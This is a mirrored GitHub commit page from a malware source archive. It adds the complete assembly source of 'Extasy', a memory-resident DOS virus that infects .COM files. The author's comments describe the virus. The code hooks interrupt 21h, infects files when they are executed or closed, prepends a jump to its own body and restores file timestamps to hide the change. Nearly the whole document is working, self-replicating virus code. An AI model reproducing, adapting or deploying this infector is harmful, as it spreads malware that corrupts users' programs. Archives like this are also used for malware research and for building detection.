mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-15 15:29:23 +00:00
Add files via upload
This commit is contained in:
vxunderground
GitHub
@@ -0,0 +1,197 @@
|
||||
; Virusname: Extasy
|
||||
; Origin: Sweden
|
||||
; Author: Metal Militia
|
||||
|
||||
; This virus can be found with any anti-virus program, since it's been
|
||||
; around for a while now. (SCAN/TB-SCAN/F-PROT/SOLOMON that is..)
|
||||
;
|
||||
; It's a resident .COM infector, without any encryption or stealth
|
||||
; capabilities. It infects when you execute (4bh) or closes (3eh).
|
||||
; This virus looks pretty much like RAVAGE, since it's pretty much
|
||||
; alike except for that RAVAGE infects .EXE files too.
|
||||
;
|
||||
; I stopped with this virus since it's so totally buggy that you'll find
|
||||
; it almost at once. This is the reason why i give you the source code.
|
||||
; In my later resident things, there will be such things as encryption,
|
||||
; stealth etc. i think..
|
||||
|
||||
|
||||
.model tiny
|
||||
.code
|
||||
.radix 16
|
||||
.code
|
||||
|
||||
viruslength = heap - _small
|
||||
startload = 90 * 4
|
||||
|
||||
_small:
|
||||
call relative
|
||||
oldheader dw 020cdh
|
||||
dw 0bh dup (0)
|
||||
relative:
|
||||
pop bp
|
||||
push ds
|
||||
push es
|
||||
xor ax,ax
|
||||
mov ds,ax
|
||||
mov es,ax
|
||||
mov di,startload
|
||||
cmp word ptr ds:[di+25],di
|
||||
jz exit_small
|
||||
|
||||
lea si,[bp-3]
|
||||
mov cx,viruslength
|
||||
db 2Eh
|
||||
rep movsb
|
||||
|
||||
mov di,offset old21 + startload
|
||||
mov si,21*4
|
||||
push si
|
||||
movsw
|
||||
movsw
|
||||
pop di
|
||||
mov ax,offset int21 + startload
|
||||
stosw
|
||||
xchg ax,cx
|
||||
stosw
|
||||
|
||||
exit_small:
|
||||
pop es
|
||||
pop ds
|
||||
|
||||
or sp,sp
|
||||
jnp returnCOM
|
||||
|
||||
returnGNU:
|
||||
returnCOM:
|
||||
mov di,100
|
||||
push di
|
||||
mov si,bp
|
||||
movsw
|
||||
movsb
|
||||
ret
|
||||
|
||||
infect:
|
||||
push ax
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push si
|
||||
push di
|
||||
push ds
|
||||
push es
|
||||
|
||||
mov ax,3d02
|
||||
int 21
|
||||
xchg ax,bx
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
push cs
|
||||
pop es
|
||||
|
||||
mov ax,5700h
|
||||
int 21h
|
||||
|
||||
push cx
|
||||
push dx
|
||||
|
||||
mov si,offset oldheader+startload
|
||||
|
||||
mov ah,3f
|
||||
mov cx,18
|
||||
push cx
|
||||
mov dx,si
|
||||
int 21
|
||||
|
||||
cmp ax,cx
|
||||
jnz go_already_infected
|
||||
|
||||
mov di,offset target + startload
|
||||
push di
|
||||
rep movsb
|
||||
pop di
|
||||
|
||||
mov ax,4202
|
||||
cwd
|
||||
int 21
|
||||
|
||||
cmp ds:[di],'ZM'
|
||||
jz infectNOT
|
||||
cmp ds:[di],'MZ'
|
||||
jz infectNOT
|
||||
|
||||
sub ax,3
|
||||
mov byte ptr ds:[di],0e9
|
||||
mov ds:[di+1],ax
|
||||
|
||||
sub ax,viruslength
|
||||
cmp ds:[si-17],ax
|
||||
jnz finishinfect
|
||||
|
||||
go_already_infected:
|
||||
pop cx
|
||||
jmp short already_infected
|
||||
|
||||
db "EXTASY!"
|
||||
db "(c) Metal Militia / Immortal Riot"
|
||||
|
||||
int21:
|
||||
cmp ax,4b00
|
||||
jz kewl
|
||||
cmp ax,3e00
|
||||
jnz oops
|
||||
mov ah,45
|
||||
int 21
|
||||
jmp kewl
|
||||
|
||||
oops:
|
||||
jmp chain
|
||||
|
||||
infectNOT:
|
||||
jmp go_already_infected
|
||||
|
||||
kewl:
|
||||
jmp infect
|
||||
|
||||
finishinfect:
|
||||
mov cx,viruslength
|
||||
mov dx,startload
|
||||
mov ah,40
|
||||
int 21
|
||||
|
||||
mov ax,4200
|
||||
xor cx,cx
|
||||
cwd
|
||||
int 21
|
||||
|
||||
mov ah,40
|
||||
mov dx,di
|
||||
pop cx
|
||||
int 21
|
||||
already_infected:
|
||||
pop dx
|
||||
pop cx
|
||||
|
||||
mov ax,5701h
|
||||
int 21h
|
||||
|
||||
mov ah,3e
|
||||
int 21
|
||||
exitinfect:
|
||||
pop es
|
||||
pop ds
|
||||
pop di
|
||||
pop si
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
chain:
|
||||
db 0ea
|
||||
heap:
|
||||
old21 dw ?, ?
|
||||
target dw 0ch dup (?)
|
||||
|
||||
endheap:
|
||||
end _small
|
||||
Reference in New Issue
Block a user